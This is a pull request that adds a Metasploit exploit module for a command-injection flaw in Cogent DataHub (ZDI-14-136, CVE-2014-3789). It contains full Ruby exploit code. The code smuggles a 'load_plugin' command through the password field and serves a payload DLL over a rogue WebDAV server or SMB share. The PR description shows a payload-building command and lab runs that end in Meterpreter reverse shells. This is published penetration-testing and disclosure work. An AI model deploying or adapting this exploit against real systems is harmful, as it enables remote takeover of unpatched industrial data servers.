### PR TITLE
Add module for ZDI-14-136, Cogent DataHub

### DIFF
--- a/modules/exploits/windows/http/cogent_datahub_command.rb
+++ b/modules/exploits/windows/http/cogent_datahub_command.rb
@@ -1,0 +1,434 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  # Exploitation is reliable, but the service hangs and needs manual restarting.
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+
+  def initialize
+    super(
+      'Name'        	=> 'Cogent DataHub Command Injection',
+      'Description'   => %q{
+        This module exploits an injection vulnerability in Cogent DataHub prior to 7.3.5. The
+        vulnerability exists in the GetPermissions.asp page, which makes an insecure usage of
+        the datahub_command function with user controlled data, allowing execution of arbitrary
+        datahub commands. This module has been tested successfully with Cogent DataHub 7.3.1 on
+        Windows 7 SP1.
+      },
+      'Author'      => [
+        'John Leitch', # Vulnerability discovery
+        'juan vazquez' # Metasploit module
+      ],
+      'Platform'    => 'win',
+      'References'  =>
+        [
+          ['ZDI', '14-136'],
+          ['CVE', '2014-3789'],
+          ['BID', '67486']
+        ],
+      'Stance'      => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' => {
+        'WfsDelay' => 30,
+        'InitialAutoRunScript' => 'migrate -f'
+      },
+      'Targets'     =>
+        [
+          [ 'Cogent DataHub < 7.3.5', { } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Apr 29 2014'
+    )
+    register_options(
+      [
+        OptString.new('URIPATH',   [ true,  'The URI to use (do not change)', '/' ]),
+        OptPort.new('SRVPORT',     [ true,  'The daemon port to listen on (do not change)', 80 ]),
+        OptInt.new('WEBDAV_DELAY', [ true,   'Time that the HTTP Server will wait for the payload request', 20]),
+        OptString.new('UNCPATH',   [ false, 'Override the UNC path to use.' ])
+      ], self.class)
+  end
+
+  def autofilter
+    false
+  end
+
+  def on_request_uri(cli, request)
+    case request.method
+      when 'OPTIONS'
+        process_options(cli, request)
+      when 'PROPFIND'
+        process_propfind(cli, request)
+      when 'GET'
+        process_get(cli, request)
+      else
+        vprint_status("#{request.method} => 404 (#{request.uri})")
+        resp = create_response(404, "Not Found")
+        resp.body = ""
+        resp['Content-Type'] = 'text/html'
+        cli.send_response(resp)
+    end
+  end
+
+  def process_get(cli, request)
+
+    if blacklisted_path?(request.uri)
+      vprint_status("GET => 404 [BLACKLIST] (#{request.uri})")
+      resp = create_response(404, "Not Found")
+      resp.body = ""
+      cli.send_response(resp)
+      return
+    end
+
+    if request.uri.include?(@basename)
+      print_status("GET => Payload")
+      return if ((p = regenerate_payload(cli)) == nil)
+      data = generate_payload_dll({ :code => p.encoded })
+      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+      return
+    end
+
+    # Treat index.html specially
+    if (request.uri[-1,1] == "/" or request.uri =~ /index\.html?$/i)
+      vprint_status("GET => REDIRECT (#{request.uri})")
+      resp = create_response(200, "OK")
+
+      resp.body = %Q|<html><head><meta http-equiv="refresh" content="0;URL=#{@exploit_unc}#{@share_name}\\"></head><body></body></html>|
+
+      resp['Content-Type'] = 'text/html'
+      cli.send_response(resp)
+      return
+    end
+
+    # Anything else is probably a request for a data file...
+    vprint_status("GET => DATA (#{request.uri})")
+    data = rand_text_alpha(4 + rand(4))
+    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+  end
+
+  #
+  # OPTIONS requests sent by the WebDav Mini-Redirector
+  #
+  def process_options(cli, request)
+    vprint_status("OPTIONS #{request.uri}")
+    headers = {
+      'MS-Author-Via' => 'DAV',
+      'DASL'          => '<DAV:sql>',
+      'DAV'           => '1, 2',
+      'Allow'         => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
+      'Public'        => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
+      'Cache-Control' => 'private'
+    }
+    resp = create_response(207, "Multi-Status")
+    headers.each_pair {|k,v| resp[k] = v }
+    resp.body = ""
+    resp['Content-Type'] = 'text/xml'
+    cli.send_response(resp)
+  end
+
+  #
+  # PROPFIND requests sent by the WebDav Mini-Redirector
+  #
+  def process_propfind(cli, request)
+    path = request.uri
+    vprint_status("PROPFIND #{path}")
+
+    if path !~ /\/$/
+
+      if blacklisted_path?(path)
+        vprint_status "PROPFIND => 404 (#{path})"
+        resp = create_response(404, "Not Found")
+        resp.body = ""
+        cli.send_response(resp)
+        return
+      end
+
+      if path.index(".")
+        vprint_status "PROPFIND => 207 File (#{path})"
+        body = %Q|<?xml version="1.0" encoding="utf-8"?>
+<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
+<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+<D:href>#{path}</D:href>
+<D:propstat>
+<D:prop>
+<lp1:resourcetype/>
+<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
+<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>
+<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
+<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
+<lp2:executable>T</lp2:executable>
+<D:supportedlock>
+<D:lockentry>
+<D:lockscope><D:exclusive/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+<D:lockentry>
+<D:lockscope><D:shared/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+</D:supportedlock>
+<D:lockdiscovery/>
+<D:getcontenttype>application/octet-stream</D:getcontenttype>
+</D:prop>
+<D:status>HTTP/1.1 200 OK</D:status>
+</D:propstat>
+</D:response>
+</D:multistatus>
+|
+        # send the response
+        resp = create_response(207, "Multi-Status")
+        resp.body = body
+        resp['Content-Type'] = 'text/xml; charset="utf8"'
+        cli.send_response(resp)
+        return
+      else
+        vprint_status "PROPFIND => 301 (#{path})"
+        resp = create_response(301, "Moved")
+        resp["Location"] = path + "/"
+        resp['Content-Type'] = 'text/html'
+        cli.send_response(resp)
+        return
+      end
+    end
+
+    vprint_status "PROPFIND => 207 Directory (#{path})"
+    body = %Q|<?xml version="1.0" encoding="utf-8"?>
+<D:multistatus xmlns:D="DAV:" xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/">
+  <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+    <D:href>#{path}</D:href>
+    <D:propstat>
+      <D:prop>
+        <lp1:resourcetype><D:collection/></lp1:resourcetype>
+        <lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
+        <lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
+        <lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
+        <D:supportedlock>
+          <D:lockentry>
+            <D:lockscope><D:exclusive/></D:lockscope>
+            <D:locktype><D:write/></D:locktype>
+          </D:lockentry>
+          <D:lockentry>
+            <D:lockscope><D:shared/></D:lockscope>
+            <D:locktype><D:write/></D:locktype>
+          </D:lockentry>
+        </D:supportedlock>
+        <D:lockdiscovery/>
+        <D:getcontenttype>httpd/unix-directory</D:getcontenttype>
+      </D:prop>
+    <D:status>HTTP/1.1 200 OK</D:status>
+  </D:propstat>
+</D:response>
+|
+
+    if request["Depth"].to_i > 0
+      trail = path.split("/")
+      trail.shift
+      case trail.length
+        when 0
+          body << generate_shares(path)
+        when 1
+          body << generate_files(path)
+      end
+    else
+      vprint_status "PROPFIND => 207 Top-Level Directory"
+    end
+
+    body << "</D:multistatus>"
+
+    body.gsub!(/\t/, '')
+
+    # send the response
+    resp = create_response(207, "Multi-Status")
+    resp.body = body
+    resp['Content-Type'] = 'text/xml; charset="utf8"'
+    cli.send_response(resp)
+  end
+
+  def generate_shares(path)
+    share_name = @share_name
+    %Q|
+<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+<D:href>#{path}#{share_name}/</D:href>
+<D:propstat>
+<D:prop>
+<lp1:resourcetype><D:collection/></lp1:resourcetype>
+<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
+<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
+<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
+<D:supportedlock>
+<D:lockentry>
+<D:lockscope><D:exclusive/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+<D:lockentry>
+<D:lockscope><D:shared/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+</D:supportedlock>
+<D:lockdiscovery/>
+<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
+</D:prop>
+<D:status>HTTP/1.1 200 OK</D:status>
+</D:propstat>
+</D:response>
+|
+  end
+
+  def generate_files(path)
+    trail = path.split("/")
+    return "" if trail.length < 2
+
+    base  = @basename
+    exts  = @extensions.gsub(",", " ").split(/\s+/)
+    files = ""
+    exts.each do |ext|
+      files << %Q|
+<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
+<D:href>#{path}#{base}.#{ext}</D:href>
+<D:propstat>
+<D:prop>
+<lp1:resourcetype/>
+<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
+<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>
+<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
+<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
+<lp2:executable>T</lp2:executable>
+<D:supportedlock>
+<D:lockentry>
+<D:lockscope><D:exclusive/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+<D:lockentry>
+<D:lockscope><D:shared/></D:lockscope>
+<D:locktype><D:write/></D:locktype>
+</D:lockentry>
+</D:supportedlock>
+<D:lockdiscovery/>
+<D:getcontenttype>application/octet-stream</D:getcontenttype>
+</D:prop>
+<D:status>HTTP/1.1 200 OK</D:status>
+<D:ishidden b:dt="boolean">1</D:ishidden>
+</D:propstat>
+</D:response>
+|
+    end
+
+    files
+  end
+
+  def gen_timestamp(ttype=nil)
+    ::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT")
+  end
+
+  def gen_datestamp(ttype=nil)
+    ::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ")
+  end
+
+  # This method rejects requests that are known to break exploitation
+  def blacklisted_path?(uri)
+    share_path = "/#{@share_name}"
+    payload_path = "#{share_path}/#{@basename}.dll"
+    case uri
+      when payload_path
+        return false
+      when share_path
+        return false
+      else
+        return true
+    end
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'),
+      'vars_post' =>
+        {
+          'username' => rand_text_alpha(4 + rand(4)),
+          'password' => rand_text_alpha(4 + rand(4))
+        }
+      })
+
+    if res && res.code == 200 && res.body =~ /PermissionRecord/
+        return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def send_injection(dll)
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri('/', 'Silverlight', 'GetPermissions.asp'),
+      'vars_post' =>
+        {
+          'username' => rand_text_alpha(3 + rand(3)),
+          'password' => "#{rand_text_alpha(3 + rand(3))}\")(load_plugin \"#{dll}\" 1)(\""
+        }
+      }, 1)
+
+    res
+  end
+
+  def on_new_session(session)
+    if service
+      service.stop
+    end
+
+    super
+  end
+
+  def primer
+    print_status("#{peer} - Sending injection...")
+    res = send_injection("\\\\\\\\#{@myhost}\\\\#{@share_name}\\\\#{@basename}.dll")
+    if res
+      print_error("#{peer} - Unexpected answer")
+    end
+  end
+
+  def exploit
+    if datastore['UNCPATH'].blank?
+      @basename = rand_text_alpha(3)
+      @share_name = rand_text_alpha(3)
+      @extensions = "dll"
+      @system_commands_file = rand_text_alpha_lower(4)
+
+      @myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+
+      @exploit_unc  = "\\\\#{@myhost}\\"
+
+      if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
+        fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
+      end
+
+      print_status("Starting Shared resource at #{@exploit_unc}#{@share_name}\\#{@basename}.dll")
+
+      begin
+        Timeout.timeout(datastore['WEBDAV_DELAY']) { super } # The Windows Webclient needs some time...
+      rescue ::Timeout::Error
+        service.stop if service
+      end
+    else
+      # Using external SMB Server
+      if datastore['UNCPATH'] =~ /\\\\([^\\]*)\\([^\\]*)\\([^\\]*\.dll)/
+        host = $1
+        share_name = $2
+        dll_name = $3
+        print_status("#{peer} - Sending injection...")
+        res = send_injection("\\\\\\\\#{host}\\\\#{share_name}\\\\#{dll_name}")
+        if res
+          print_error("#{peer} - Unexpected answer")
+        end
+      else
+        fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be \\\\host\\shared_folder\\base_name.dll')
+      end
+    end
+  end
+
+end


### PR DESCRIPTION
## Verification
- [x] Install Windows 7 SP1 (32 bits)
- [x] Install Cogent DataHub < 7.3.4. I've used an installer for 7.3.1 evaluation already had.
- Test the module with Webclient enabled and the webdav server.
- [x] Enable the Webclient service on Windows 7 SP1. 
- [x] Run Cogent DataHub (I use to run as administrator, and be sure which network traffic is enabled)
- [x] Use the module like in the next demo, root privileges will be needed to run the Webdav service, parameters
  must be correctly configured. 

```
msf > use exploit/windows/http/cogent_datahub_command
msf exploit(cogent_datahub_command) > set SRVHOST 172.16.158.1
SRVHOST => 172.16.158.1
msf exploit(cogent_datahub_command) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(cogent_datahub_command) > set LHOST 172.16.158.1
LHOST => 172.16.158.1
msf exploit(cogent_datahub_command) > set RHOST 172.16.158.164
RHOST => 172.16.158.164
msf exploit(cogent_datahub_command) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting Shared resource at \\172.16.158.1\xgZ\tXV.dll
[*] Using URL: http://172.16.158.1:80/
[*] Server started.
[*] 172.16.158.164:80 - Sending injection...
[*] 172.16.158.164   cogent_datahub_command - GET => Payload
[*] Sending stage (770048 bytes) to 172.16.158.164
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.164:49163) at 2014-06-04 09:42:40 -0500
[*] Server stopped.

meterpreter >
[*] Session ID 1 (172.16.158.1:4444 -> 172.16.158.164:49163) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (1820)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2124
[+] Successfully migrated to process

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter >
```
- Test the module with a shared resource 
- [x] Install a linux machine, samba and configure a "guest" accessible resource.
- [x] Place a DLL with the payload in the shared resource

```
./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.158.1 LPORT=4444 D > /tmp/msf.dll
```
- [x] Run Cogent DataHub (I use to run it as administrator, and be sure which network traffic is enabled)
- [x] Use the module like in the next demo, the important thing is to set UNCPATH pointing to the DLL in the shared resource

```
msf exploit(cogent_datahub_command) > set UNCPATH \\\\172.16.158.165\\shared\\msf.dll
UNCPATH => \\172.16.158.165\shared\msf.dll
msf exploit(cogent_datahub_command) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(cogent_datahub_command) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(cogent_datahub_command) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.164:80 - Sending injection...
[*] Sending stage (770048 bytes) to 172.16.158.164
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.164:49200) at 2014-06-04 10:25:55 -0500

meterpreter >
[*] Session ID 2 (172.16.158.1:4444 -> 172.16.158.164:49200) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (2420)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3344
[+] Successfully migrated to process

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
```
